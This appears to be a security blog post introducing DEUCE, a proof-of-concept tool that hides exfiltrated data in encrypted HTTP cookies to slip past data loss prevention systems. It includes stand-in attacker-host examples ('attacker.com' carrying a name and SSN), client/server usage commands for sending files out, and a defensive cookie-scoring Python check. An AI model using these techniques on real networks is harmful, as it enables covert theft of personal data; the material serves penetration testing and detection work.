DEUCE: Bypassing DLP with Cookies

Thursday, July 19, 2012

f8lerror


At a recent BSides event, there was a talk about data exfiltration and Data Loss Prevention (DLP) systems.

A known vector for bypassing DLP is DNS lookups (for example with NSLookup): the attacker resolves a domain he controls, prepending a hostname that contains the data that needs to be sent outside the controlled environment.

This means that if an attacker wanted to steal a name and social security number, he would request “johndoe123-45-1234.attacker.com”. The request hits the attacker's DNS server and is logged there, creating a list of identities for the attacker to mine at a later time.

The maximum length for this kind of attack is 255 characters. This concept got me thinking: what about a standard GET request such as http://attacker.com/johndoe123-45-1234? This would make life easier for the attacker.

He would no longer need to control the DNS server; he would just need to see what pages were requested. We would still be limited by the character maximum, and each request could be easily logged and analyzed by proxies or alerting systems.

But, let’s be honest, most DLP systems are going to alert on these types of requests, or at least they should.  

After some discussion with friends, it was pointed out that using cookies would be a great alternative. Cookies aren't normally logged by proxies or other systems. Also, if the cookie value is encoded or encrypted, as it normally is, it keeps the DLP and prying eyes at bay.

As an added benefit, we are no longer limited by the 255-character maximum, and one request could send many cookies. This led to the need for a tool to test the concept. Enter Data Exfiltration Using Cookie Encryption, or DEUCE.

DEUCE went from a simple concept to a multi-encoding and encryption DLP bypass tool. The program takes an input file and creates a cookie for each line. DEUCE can encrypt with AES, hash with MD5, or use a custom multi-encode with a replacement cipher applied 3 times.

The program then sends its data to the server, where the AES and multi-encoded options are automatically converted back to plain text. MD5 is a one-way hash that would need to be cracked.

However, if an attacker sent a list of social security numbers, it would take only minutes to crack the 9-digit numbers with a tool like Hashcat. In the Python code you can change the name of the cookie; just make sure you change it in both the client and the server.
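The traits this post relies on (many cookies in one request, large values, and encoded or encrypted values that look like random text) are also what a defender can alert on. The following is an added example of such a check, not code from the post or from DEUCE; the thresholds, the sample headers and the `score_cookie_header` helper are assumptions constructed for illustration.

```python
import math
import string
from collections import Counter

# Illustrative thresholds (assumptions, not from the DEUCE post). In practice
# derive them from a baseline of normal Cookie header sizes per destination host.
MAX_COOKIES = 8         # legitimate sites rarely send this many cookies at once
MAX_TOTAL_BYTES = 1024  # combined size of all cookie values in one request
MIN_SCORED_LEN = 24     # only score entropy on values long enough to carry data
ENTROPY_BITS = 4.5      # bits/char; base64 or hex ciphertext sits well above prose

def shannon_entropy(value: str) -> float:
    """Shannon entropy in bits per character (0.0 for an empty string)."""
    if not value:
        return 0.0
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in Counter(value).values())

def parse_cookie_header(header: str) -> dict:
    """Split a raw 'Cookie:' request header value into {name: value}."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value.strip()
    return cookies

def score_cookie_header(header: str) -> dict:
    """Return size figures plus the reasons (if any) the request looks like exfil."""
    cookies = parse_cookie_header(header)
    total = sum(len(v) for v in cookies.values())
    long_values = [v for v in cookies.values() if len(v) >= MIN_SCORED_LEN]
    max_entropy = max((shannon_entropy(v) for v in long_values), default=0.0)
    reasons = []
    if len(cookies) > MAX_COOKIES:
        reasons.append(f"{len(cookies)} cookies in one request")
    if total > MAX_TOTAL_BYTES:
        reasons.append(f"{total} bytes of cookie values")
    if max_entropy > ENTROPY_BITS:
        reasons.append(f"value entropy {max_entropy:.2f} bits/char")
    return {"cookies": len(cookies), "total_bytes": total,
            "max_entropy": max_entropy, "reasons": reasons}

# Constructed sample headers (not captured traffic). SUSPECT stands in for a
# DEUCE-style request: one cookie per input line, each value opaque ciphertext.
BENIGN = "sessionid=abc123def456; lang=en; consent=yes"
_B64 = string.ascii_letters + string.digits + "+/"
SUSPECT = "; ".join(f"d{i}={_B64[i:] + _B64[:i]}" for i in range(20))
```

Run `score_cookie_header(SUSPECT)["reasons"]` against a proxy's request headers to see which of the three traits fired; a single trait on its own (for example one long high-entropy token) is common on legitimate sites, so the combination is the stronger signal.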

DEUCE is written in Python but could easily be converted to an executable using py2exe or PyInstaller; the AES encryption relies on PyCrypto.

Because this is just a proof-of-concept tool, DEUCE does not currently support SSL, but it may in the future. Using DEUCE is simple. By default the server listens on all interfaces on port 80. The DEUCE client has more options, such as the encryption and encoding method, the target URL and the input file.

Example usage below:

  • python deuce_server.py -o output.txt
    • This starts the listening server on all interfaces on port 80, with the output written to output.txt

  • python deuce_client.py -u http://location_of_deuce_server -i inputfile.txt -m
    • This starts the DEUCE client and sends all data in the input file to http://location_of_deuce_server; the -m option tells DEUCE to use multi-encode mode.

Please feel free to test this concept in your environment; obviously I do not have access to every possible solution out there.

It is important to note I am in no way responsible for how you use DEUCE. This tool is designed to help penetration testers and assist users in testing their DLP implementation. You are not permitted to use DEUCE for any illegal means.  

Thanks to Brandon Knight (@kaospunk) for the cookie idea and Jake Garlie (@_Jagar_) for listening to me rant about this.

The DEUCE client and server can be downloaded from http://blog.infosecsee.com

Cross-posted from http://infosecsee.com
